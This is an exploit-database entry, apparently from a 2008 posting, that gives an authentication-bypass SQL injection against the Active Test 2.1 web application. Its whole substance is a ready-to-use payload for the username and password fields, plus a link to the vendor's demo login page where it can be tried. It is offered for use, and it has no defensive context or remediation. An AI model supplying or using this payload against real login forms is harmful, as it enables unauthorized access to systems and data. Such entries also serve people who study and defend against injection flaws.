id: 4298
date: 11/29/2008
title: Active Test 2.1 (Auth Bypass) Remote SQL Injection Vulnerability
author: R3d-D3v!L
cves: 

================================================================
Active Test 2.1 (Auth Bypass) Remote SQL Injection Vulnerability
================================================================


[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~]Vendor: www.activewebsoftwares.com
   
 [~]Software: Active Test v 2.1
   
 [~] Date: 28.11.2008
   
 [~] Home: www.ahacker.biz
   
 [~] contact: N/A

[~] -----------------------------------------------------------
   
   
 [~] Exploit:
   
  username: r0' or ' 1=1--
  password: r0' or ' 1=1--
   
   
 [~]login 4 d3m0:
   
  http://www.activewebsoftwares.com/demoactivetest/register.asp
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2023-03-23]  #